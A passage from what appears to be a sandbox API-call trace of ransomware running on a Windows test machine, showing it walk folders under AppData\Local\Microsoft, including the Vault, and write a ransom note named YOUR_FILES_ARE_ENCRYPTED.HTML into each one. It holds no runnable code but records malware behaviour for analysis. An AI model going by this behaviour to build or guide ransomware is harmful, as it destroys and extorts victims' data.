lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady" [0114.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\*" [0114.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.249] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.249] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0114.249] StrStrIW (lpFirst="Internet Explorer", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.249] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer") returned 77 [0114.249] GetProcessHeap () returned 0x600000 [0114.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.249] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer" [0114.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\*" [0114.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.250] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="..", cAlternateFileName="")) returned 1 [0114.250] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="Desktop", cAlternateFileName="")) returned 1 [0114.250] StrStrIW (lpFirst="Desktop", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.250] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop") returned 85 [0114.250] GetProcessHeap () returned 0x600000 [0114.250] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.251] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop" [0114.251] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop\\*" [0114.251] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632df8, dwReserved1=0x6f4620, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.251] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632df8, dwReserved1=0x6f4620, cFileName="..", cAlternateFileName="")) returned 1 [0114.251] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632df8, dwReserved1=0x6f4620, cFileName="..", cAlternateFileName="")) returned 0 [0114.251] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.251] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0114.251] GetProcessHeap () returned 0x600000 [0114.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\playready\\internet explorer\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.260] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.261] CloseHandle (hObject=0x324) returned 1 [0114.261] GetProcessHeap () returned 0x600000 [0114.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.261] GetProcessHeap () returned 0x600000 [0114.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.261] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4690, dwReserved1=0x6f4618, cFileName="Desktop", cAlternateFileName="")) returned 0 [0114.261] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.261] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0114.261] GetProcessHeap () returned 0x600000 [0114.261] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\playready\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.261] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.262] CloseHandle (hObject=0x31c) returned 1 [0114.262] GetProcessHeap () returned 0x600000 [0114.262] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.263] GetProcessHeap () returned 0x600000 [0114.263] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.263] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0114.263] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.263] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0114.263] GetProcessHeap () returned 0x600000 [0114.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\PlayReady\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\playready\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.265] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.266] CloseHandle (hObject=0x320) returned 1 [0114.266] GetProcessHeap () returned 0x600000 [0114.266] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.266] GetProcessHeap () returned 0x600000 [0114.266] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.267] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Vault", cAlternateFileName="")) returned 1 [0114.267] StrStrIW (lpFirst="Vault", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.267] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault") returned 55 [0114.267] GetProcessHeap () returned 0x600000 [0114.267] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.268] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault" [0114.268] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\*" [0114.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0114.268] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.268] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb8beb5c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb8beb5c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb8beb5c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="4BF4C442-9B8A-41A0-B380-DD4A704DDB28", cAlternateFileName="4BF4C4~1")) returned 1 [0114.269] StrStrIW (lpFirst="4BF4C442-9B8A-41A0-B380-DD4A704DDB28", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.269] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28") returned 92 [0114.269] GetProcessHeap () returned 0x600000 [0114.269] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.269] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28" [0114.269] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\*" [0114.269] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb8beb5c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb8beb5c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb8beb5c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fcd0, dwReserved1=0x60fc60, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.269] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb8beb5c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb8beb5c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb8beb5c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fcd0, dwReserved1=0x60fc60, cFileName="..", cAlternateFileName="")) returned 1 [0114.269] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8beb5c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb8beb5c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb8beb5c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1b4, dwReserved0=0x60fcd0, dwReserved1=0x60fc60, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 1 [0114.269] StrStrIW (lpFirst="Policy.vpol", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.269] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\Policy.vpol") returned 104 [0114.269] PathFindExtensionW (pszPath="Policy.vpol") returned=".vpol" [0114.269] lstrlenW (lpString=".vpol") returned 5 [0114.269] PathFindExtensionW (pszPath="Policy.vpol") returned=".vpol" [0114.269] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8beb5c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb8beb5c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb8beb5c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1b4, dwReserved0=0x60fcd0, dwReserved1=0x60fc60, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 0 [0114.270] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.270] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0114.270] GetProcessHeap () returned 0x600000 [0114.270] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\vault\\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0114.272] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.273] CloseHandle (hObject=0x31c) returned 1 [0114.273] GetProcessHeap () returned 0x600000 [0114.273] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.273] GetProcessHeap () returned 0x600000 [0114.273] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.273] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9574d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb9574d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="UserProfileRoaming", cAlternateFileName="USERPR~1")) returned 1 [0114.273] StrStrIW (lpFirst="UserProfileRoaming", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.273] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming") returned 74 [0114.273] GetProcessHeap () returned 0x600000 [0114.274] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.274] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming" [0114.274] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming\\*" [0114.274] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Vault\\UserProfileRoaming\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9574d8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb9574d8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fcd0, dwReserved1=0x60fc60, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0114.274] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | 